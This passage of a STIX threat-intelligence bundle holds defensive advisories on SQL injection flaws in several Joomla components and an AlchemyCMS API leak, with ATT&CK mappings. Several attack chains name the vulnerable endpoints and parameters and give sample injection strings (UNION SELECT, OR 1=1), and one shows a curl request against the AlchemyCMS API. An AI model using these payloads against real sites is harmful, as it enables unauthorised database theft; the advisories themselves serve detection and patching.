          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b56cd3a-4f81-5e22-935b-3a776b1e200d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb590380-7d0c-5742-a971-d6daa0509ec8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Cloud Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8899a09d-5662-502a-a705-bdd8ee85eb9a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb590380-7d0c-5742-a971-d6daa0509ec8",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--708d1bd9-fed6-55ad-9bfb-58505106ad40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb590380-7d0c-5742-a971-d6daa0509ec8",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bb590380-7d0c-5742-a971-d6daa0509ec8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! FocalPoint Pro/Free SQL Injection (CVE-2017-20263)",
      "description": "## Overview\n\nCVE-2017-20263 details a critical SQL injection vulnerability affecting Joomla! Component FocalPoint Pro/Free version 1.2.3. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries by manipulating the `id` parameter within specific GET requests. By crafting malicious SQL code into the `id` parameter when requesting `index.php` with `option=com_focalpoint` and `view=location`, attackers can force the application to disclose sensitive database information. The vulnerability, first documented in 2026, presents a significant risk to organizations using the affected Joomla! component, potentially leading to unauthorized data exposure and further compromise if database credentials are leaked.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable Joomla! instance running FocalPoint Pro/Free version 1.2.3.\n2.  The attacker crafts a malicious HTTP GET request targeting `index.php` on the vulnerable server.\n3.  The request includes specific parameters: `option=com_focalpoint` and `view=location`.\n4.  The attacker injects SQL commands (e.g., `id=1 UNION SELECT USER(), DATABASE()`) into the `id` parameter of this GET request.\n5.  The vulnerable FocalPoint component processes the request without proper sanitization, leading to the execution of the attacker-supplied SQL queries against the backend database.\n6.  The database responds to these queries, returning sensitive information such as user credentials, database schemas, or application data within the web application's output.\n7.  The attacker parses the HTTP response to extract the disclosed sensitive database information.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20263 grants unauthenticated attackers the ability to extract sensitive information directly from the underlying database of the Joomla! application. This can include confidential user data, hashed passwords, session tokens, and configuration details. Such data exfiltration can lead to severe consequences, including further account compromise, unauthorized access to internal systems, or compliance violations. Organizations in any sector using the vulnerable component are at risk of data breaches and reputational damage if their databases are exposed.\n\n## Recommendation\n\n*   Patch CVE-2017-20263 by upgrading the Joomla! FocalPoint Pro/Free component to a version beyond 1.2.3 immediately.\n*   Deploy the Sigma rule \"Detects CVE-2017-20263 Exploitation Attempt\" to your SIEM system to identify exploitation attempts.\n*   Enable comprehensive web server access logging to capture full HTTP request details, including query strings, which are essential for the detection rule.\n",
      "published": "2026-06-19T16:34:10Z",
      "labels": [
        "sqli",
        "web-vulnerability",
        "joomla",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20263"
        },
        {
          "source_name": "reference",
          "url": "http://focalpointx.com/"
        },
        {
          "source_name": "reference",
          "url": "http://focalpointx.com/demos/focalpoint-pro"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42530"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-focalpoint-pro-free-sql-injection-via-location"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd3859e1-cbbd-5bef-ab54-9fab0b8fe631",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--01d06335-1b9a-5a02-8a88-ac7fb585d667",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2486c615-b9d5-548f-9699-25f95154518d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--01d06335-1b9a-5a02-8a88-ac7fb585d667",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e69b9aa8-fc16-5fb4-b937-9ff8b886b7e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--01d06335-1b9a-5a02-8a88-ac7fb585d667",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--01d06335-1b9a-5a02-8a88-ac7fb585d667",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Component Sponsor Wall 8.0 SQL Injection (CVE-2017-20264)",
      "description": "## Overview\n\nCVE-2017-20264 details an SQL injection vulnerability in Joomla! Component Sponsor Wall version 8.0, developed by Pulseextensions. This flaw allows unauthenticated attackers to execute arbitrary SQL queries by manipulating the `wallid` parameter within specific GET requests. The vulnerability is triggered when malicious SQL code is injected into the `wallid` parameter when making requests to `index.php` with `option=com_sponsorwall\u0026task=click`. Successful exploitation grants attackers the ability to extract sensitive database information, including user credentials, hashed passwords, and critical configuration data, posing a significant risk to the integrity and confidentiality of the affected Joomla! instance and its backend database. Although the CVE was published recently, the vulnerability itself dates back to 2017, indicating that unpatched systems remain at risk.\n\n## Attack Chain\n\n1.  **Reconnaissance:** An attacker identifies a target web server hosting a Joomla! instance running the vulnerable Component Sponsor Wall 8.0.\n2.  **Initial Access:** The attacker crafts a specially formed HTTP GET request targeting the `index.php` endpoint of the Joomla! application.\n3.  **Parameter Manipulation:** The GET request includes the `option=com_sponsorwall\u0026task=click\u0026wallid=` parameter, into which the attacker injects malicious SQL code designed to bypass input sanitization.\n4.  **Arbitrary Query Execution:** The vulnerable Joomla! component processes the `wallid` parameter without proper validation, leading to the execution of the injected SQL queries against the underlying database.\n5.  **Information Disclosure:** The attacker leverages the SQL injection to extract sensitive database information, which may include user credentials (usernames and hashed passwords), session tokens, and system configuration data.\n6.  **Data Exfiltration \u0026 Credential Harvesting:** The extracted sensitive data, particularly credentials, is exfiltrated by the attacker for further analysis or use.\n7.  **Persistence and Lateral Movement:** The attacker uses the stolen credentials to gain unauthorized access to the Joomla! administrator panel or other connected systems, potentially establishing persistence, defacing the website, or escalating privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20264 can lead to severe consequences for affected organizations. Attackers can gain full read access to the entire database, compromising sensitive information such as customer data, proprietary business details, and internal credentials. The extraction of administrator credentials can grant full control over the Joomla! website, enabling website defacement, content manipulation, arbitrary code execution (via plugin installation or theme modification), and serving malware to legitimate visitors. The exposure of configuration data can further aid in lateral movement within the network or lead to access to other connected services, resulting in significant data breaches, reputational damage, and compliance violations.\n\n## Recommendation\n\n*   Immediately update or remove Joomla! Component Sponsor Wall version 8.0 to a patched version or a different component if an update is not available to mitigate CVE-2017-20264.\n*   Deploy the provided Sigma rule \"Detects CVE-2017-20264 Exploitation — Joomla! Sponsor Wall SQL Injection Attempt\" to your SIEM for early detection of exploitation attempts.\n*   Ensure web server access logs are enabled and retained, specifically logging full URI paths and query strings for the `webserver` logsource to enable effective detection.\n*   Review web application firewall (WAF) configurations to ensure robust SQL injection protection rules are active and up-to-date.\n",
      "published": "2026-06-19T16:35:04Z",
      "labels": [
        "sql-injection",
        "joomla",
        "web-application",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20264"
        },
        {
          "source_name": "reference",
          "url": "http://pulseextensions.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42525"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-sponsor-wall-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0feda0fc-87ce-5eef-bae7-a48c26c59c2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5c592860-df1b-5a1b-aa0d-a99132d17696",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b02f66f-50dd-5abf-ad1c-8797d594022f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5c592860-df1b-5a1b-aa0d-a99132d17696",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a535244b-aa77-56a2-a998-921a26a24b98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5c592860-df1b-5a1b-aa0d-a99132d17696",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5c592860-df1b-5a1b-aa0d-a99132d17696",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Component Flip Wall SQL Injection (CVE-2017-20265)",
      "description": "## Overview\n\nCVE-2017-20265 details an SQL injection vulnerability impacting Joomla! Component Flip Wall version 8.0. Unauthenticated attackers can exploit this flaw by injecting malicious SQL payloads into the `wallid` parameter of specific GET requests to `index.php?option=com_flipwall\u0026task=click`. Successful exploitation allows attackers to execute arbitrary SQL queries against the backend database, leading to the extraction of sensitive information. This vulnerability, while disclosed in 2017 and recently added to NVD, remains a risk for any organizations still operating unpatched or outdated Joomla! instances with this specific component. Defenders should prioritize patching or removing the vulnerable component and implementing detection mechanisms for the described attack pattern.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification:** An unauthenticated attacker identifies a target Joomla! website running the Flip Wall 8.0 component. They confirm the presence of the CVE-2017-20265 vulnerability by sending crafted GET requests to `index.php?option=com_flipwall\u0026task=click` and observing server responses to malformed `wallid` parameters.\n2.  **Initial Payload Injection:** The attacker crafts a malicious SQL injection payload, such as a blind SQLi or an error-based SQLi, and embeds it within the `wallid` parameter of a GET request to `index.php?option=com_flipwall\u0026task=click\u0026wallid=[SQL_PAYLOAD]`.\n3.  **Server-Side Processing:** The vulnerable Joomla! component processes the GET request, and the application's backend code executes the attacker's embedded SQL payload against the underlying database.\n4.  **Information Extraction:** Through iterative requests and refined payloads, the attacker leverages the SQL injection to extract sensitive database content, such as database schema, table names, column names, user credentials, or other configuration data.\n5.  **Data Exfiltration:** The extracted database information is returned within the HTTP responses, allowing the attacker to progressively exfiltrate sensitive data from the Joomla! application's database.\n6.  **Impact:** The attacker successfully compromises sensitive database information, leading to data theft, potential unauthorized access to the Joomla! administration panel if credentials are stolen, or further compromise of the web server.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20265 leads to the complete compromise of the Joomla! application's backend database. This includes the potential extraction of all stored information, such as user accounts (usernames, hashed passwords), personal identifiable information (PII) of registered users, sensitive configuration data, and proprietary content. Organizations utilizing the vulnerable Flip Wall component are at risk of significant data breaches, reputational damage, and regulatory non-compliance if personal data is exfiltrated. The unauthenticated nature of this vulnerability means any internet-facing instance is susceptible to attack without prior access.\n\n## Recommendation\n\n*   Immediately update or remove the vulnerable Joomla! Component Flip Wall 8.0 to a patched version or a different, secure component to remediate CVE-2017-20265.\n*   Deploy the provided Sigma rules to your SIEM for detection of exploitation attempts targeting CVE-2017-20265.\n*   Enable comprehensive web server access logging (e.g., Apache, Nginx access logs) to capture full HTTP request details, including URI path and query parameters, to ensure the logsource for the provided Sigma rules is available.\n*   Regularly review web server access logs for anomalous GET requests containing SQL injection payloads, as identified in the detection rules.\n",
      "published": "2026-06-19T16:36:11Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "joomla",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20265"
        },
        {
          "source_name": "reference",
          "url": "http://pulseextensions.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42524"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-flip-wall-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aca45e55-59d8-5a32-aec2-be816058eede",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b4960328-fcf4-575e-815a-899568b45cb7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11b99e03-4738-57bf-9c59-0e907ec9d6b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b4960328-fcf4-575e-815a-899568b45cb7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Systems",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07d4b6ce-5b47-5c11-b838-288da42dce25",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b4960328-fcf4-575e-815a-899568b45cb7",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b4960328-fcf4-575e-815a-899568b45cb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla SP Movie Database Unauthenticated SQL Injection (CVE-2017-20266)",
      "description": "## Overview\n\nCVE-2017-20266 is an SQL injection vulnerability impacting Joomla SP Movie Database component version 1.3. This flaw allows unauthenticated remote attackers to execute arbitrary SQL queries against the underlying database. The vulnerability specifically resides in the `searchword` parameter within the `searchresults` view. Attackers can craft malicious SQL payloads and embed them in GET requests, enabling them to bypass authentication and extract sensitive information directly from the database. While the CVE was recently published to NVD (June 2026), the exploit itself dates back to 2017. Organizations using Joomla with the SP Movie Database component are advised to immediately verify their version and apply necessary patches or mitigations to prevent data breaches and unauthorized access.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An unauthenticated attacker identifies a public-facing Joomla instance running the vulnerable SP Movie Database component version 1.3.\n2.  **Vulnerability Identification**: The attacker identifies the `CVE-2017-20266` vulnerability affecting the `searchword` parameter within the `searchresults` view.\n3.  **Initial Access**: The attacker sends a specially crafted, unauthenticated HTTP GET request to the Joomla application, targeting the `searchresults` view (e.g., `/index.php?option=com_spmoviedb\u0026view=searchresults`).\n4.  **Exploitation**: The GET request includes a malicious SQL payload injected into the `searchword` parameter (e.g., `searchword=' OR 1=1 UNION SELECT USER(), DATABASE(), VERSION()--`).\n5.  **Command and Control**: The application processes the request, and the injected SQL query is executed by the backend database.\n6.  **Collection**: The database's response, now containing sensitive information (like database user, name, or version), is returned within the web server's HTTP response.\n7.  **Exfiltration**: The attacker parses the HTTP response to extract the sensitive database information, which could include credentials, user data, or system configuration.\n8.  **Impact**: The exfiltrated data can be used for further attacks, such as lateral movement, unauthorized access to other systems, or selling stolen information.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20266 can lead to severe consequences, primarily the unauthorized access and exfiltration of sensitive database information. This can include, but is not limited to, user credentials, personally identifiable information (PII), financial data, proprietary business data, and system configurations. The compromise of such data can result in significant financial losses, reputational damage, regulatory penalties, and further compromise of the affected organization's IT infrastructure. While specific victim counts are not available, any organization utilizing the affected version of Joomla SP Movie Database is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2017-20266 immediately**: Upgrade Joomla SP Movie Database to a version patched against CVE-2017-20266 or remove the component if it is not essential.\n*   **Deploy web server detection rules**: Implement the provided Sigma rules to detect HTTP GET requests indicating attempts to exploit CVE-2017-20266.\n*   **Enable web server logging**: Ensure comprehensive logging for HTTP requests (method, URI, query parameters, status code) on web servers hosting Joomla applications to facilitate detection.\n*   **Review database logs for unusual queries**: Monitor database query logs for unusual or complex queries originating from the web application, especially those containing SQL keywords like `UNION`, `SELECT`, `OR 1=1`.\n",
      "published": "2026-06-19T16:37:14Z",
      "labels": [
        "sqli",
        "web-application",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20266"
        },
        {
          "source_name": "reference",
          "url": "http://joomshaper.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/sp-movie-database/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42502"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-sp-movie-database-sql-injection-via-searchword"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18a265a0-d84e-597a-ae70-18cc74d78ed1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7884b68e-1cb1-5512-b43d-19b6d86b22c5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7884b68e-1cb1-5512-b43d-19b6d86b22c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Calendar Planner 1.0.1 SQL Injection (CVE-2017-20267)",
      "description": "## Overview\n\nCVE-2017-20267 details a critical SQL injection vulnerability present in Joomla! Component Calendar Planner version 1.0.1. This flaw allows unauthenticated attackers to inject arbitrary SQL commands into the backend database. By crafting malicious GET requests that target the 'events' view and manipulate the 'category_id' parameter, attackers can force the application to execute their SQL queries. The primary impact of successful exploitation is the extraction of sensitive information directly from the database, potentially including user credentials, personal data, or other confidential business records. While this CVE was published in 2026, it references a vulnerability from 2017, highlighting the long tail of unpatched vulnerabilities. Defenders should prioritize identifying and patching instances of this specific component.\n\n## Attack Chain\n\n1.  **Discovery**: An unauthenticated attacker identifies a Joomla! instance running the vulnerable Calendar Planner 1.0.1 component.\n2.  **Vulnerability Identification**: The attacker identifies the publicly accessible 'events' view within the component and its reliance on the `category_id` GET parameter.\n3.  **Payload Crafting**: The attacker crafts a malicious SQL injection payload, such as a `UNION SELECT` statement, designed to extract database schema or data.\n4.  **Request Generation**: The crafted payload is embedded within the `category_id` parameter of a GET request targeting the vulnerable endpoint (e.g., `/index.php?option=com_calendarplanner\u0026view=events\u0026category_id=\u003cSQL_PAYLOAD\u003e`).\n5.  **Execution**: The vulnerable Calendar Planner component processes the request, and due to improper input sanitization, executes the attacker's SQL commands on the backend database.\n6.  **Information Disclosure**: The results of the malicious SQL query, containing sensitive database information, are returned in the HTTP response body to the attacker.\n7.  **Data Exfiltration**: The attacker systematically iterates through database tables and columns, exfiltrating sensitive data such as user credentials, personal identifiable information (PII), or application configuration.\n8.  **Impact**: The exfiltrated data can be used for further attacks, identity theft, or sale on dark web markets, leading to significant financial and reputational damage.\n\n## Impact\n\nA successful exploitation of CVE-2017-20267 can lead to the full compromise of the database underpinning the Joomla! installation. Attackers can exfiltrate sensitive data, including user credentials, personal information, and potentially business-critical data. This could result in severe data breaches, regulatory fines, reputational damage, and further system compromise if exfiltrated credentials are reused on other systems. The unauthenticated nature of this vulnerability means that any internet-facing instance of the vulnerable component is at risk, making the potential number of victims high if left unpatched.\n\n## Recommendation\n\n*   Immediately patch or uninstall Joomla! Component Calendar Planner 1.0.1 (or earlier versions) and upgrade to a secure version to remediate CVE-2017-20267.\n*   Deploy the provided Sigma rule \"Detects CVE-2017-20267 Exploitation — SQLi in Calendar Planner\" to your SIEM for detection of exploitation attempts.\n*   Ensure web application firewalls (WAFs) are configured to detect and block common SQL injection patterns, complementing the detection rule.\n*   Enable comprehensive web server logging (category `webserver`) to ensure visibility into HTTP requests, including full URI-stem and URI-query fields, which are crucial for the detection rule.\n",
      "published": "2026-06-19T16:38:07Z",
      "labels": [
        "sqli",
        "web-vulnerability",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20267"
        },
        {
          "source_name": "reference",
          "url": "http://joomlathat.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42501"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-calendar-planner-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0b28439b-3376-57ab-bff1-a71132955e4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AlchemyCMS: Unauthenticated Nested Page API Leaks Restricted \u0026 Unpublished Content",
      "description": "## Overview\n\nA critical information disclosure vulnerability exists within Alchemy CMS, affecting versions up to 8.2.5 (including 8.0.0.a-8.0.14, 8.1.0-8.1.13, and 8.2.0-8.2.5), and all 7.x versions up to 7.4.14. The flaw lies in the `Api::PagesController#nested` endpoint, specifically `GET /api/pages/nested`, which allows any unauthenticated user to retrieve the full internal page tree, including metadata for pages marked as restricted or unpublished. More critically, appending `?elements=true` to the request exposes the actual content of these sensitive pages, completely bypassing intended access controls. This vulnerability stems from a lack of authorization checks (`authorize!`) and proper content scoping within the `nested` action, contrasting with other API actions that correctly enforce these security measures. This can lead to the unauthorized exposure of confidential organizational data.\n\n## Attack Chain\n\n1.  **Target Identification**: An attacker identifies a public-facing website running a vulnerable version of Alchemy CMS through various reconnaissance methods (e.g., banner grabbing, web application scanning, or examining publicly available information).\n2.  **Initial Information Gathering (Metadata)**: The attacker sends an unauthenticated `GET` request to the `/api/pages/nested` endpoint (e.g., `curl -s http://target.com/api/pages/nested`).\n3.  **Discovery of Sensitive Pages**: The API response provides a JSON object containing the full page tree, including metadata for all pages. This response reveals which pages are marked as `\"restricted\":true` or `\"public\":false`, indicating content that should be hidden from anonymous users.\n4.  **Targeted Content Request**: Based on the identified sensitive page metadata, the attacker constructs a new `GET` request to the same `/api/pages/nested` endpoint, this time appending the `elements=true` parameter (e.g., `curl -s 